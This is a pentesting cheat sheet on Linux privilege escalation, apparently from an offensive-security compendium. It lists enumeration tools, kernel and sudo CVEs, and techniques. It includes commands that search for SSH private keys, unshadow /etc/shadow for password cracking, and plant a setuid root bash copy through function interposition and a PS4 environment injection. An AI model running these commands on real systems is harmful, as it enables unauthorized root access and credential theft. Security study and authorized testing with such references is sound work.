killchain-compendium/Post Exploitation/Linux PrivEsc.md

Linux Privilege Escalation

Links

• Basics
• LinEnum
• Smart Enumeration
• Linux Exploit Suggester
• GTFObins
• Linpeas

Kernel Exploits

Dirty COW

• CVE-2016-5195
• c0w.c

Stored Keys & Passwords

• History
• Environment Variables
• Config + Dot Files
• SSH keys

find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null

Permissions

• Weak permissions
• Umask
• Unshadow via unshadow /etc/passd /etc/shadow > unshadow.txt and john or hashcat.
  • e.g. john --wordlist=./wordlist --format=crypt hash
• SUID
  • list

  find / -perm /6000 -ls 2>dev/null
  

  • Shared object injection
  • CVE-2016-1247
• User specific files

find / -user root -name "*.txt"

Sudo Binary

• Baron Samedit
• CVE-2019-14287
• CVE-2019-18634
• LD_PRELOAD
• sudo -l
  • Take a look at GTFObins
  • Keep an eye on the displayed host and env capabilities

PATH Hijacking

• Interpositioning binaries via PATH
  • Look for binaries used in other bins and scripts
  • Interposition name and add the directory in front of $PATH

Bash function

• Interpositioning of binaries via bash functions

function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

export -f /path/to/binary

• Call binary which invokes this function

Environment Variable

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'

Capabilities

• capabilities

Crontab

• Check cat /etc/crontab
• Check writable scripts and binaries that are scheduled
• Check $PATH order

NFS Rootsquash

• nfs rootsquash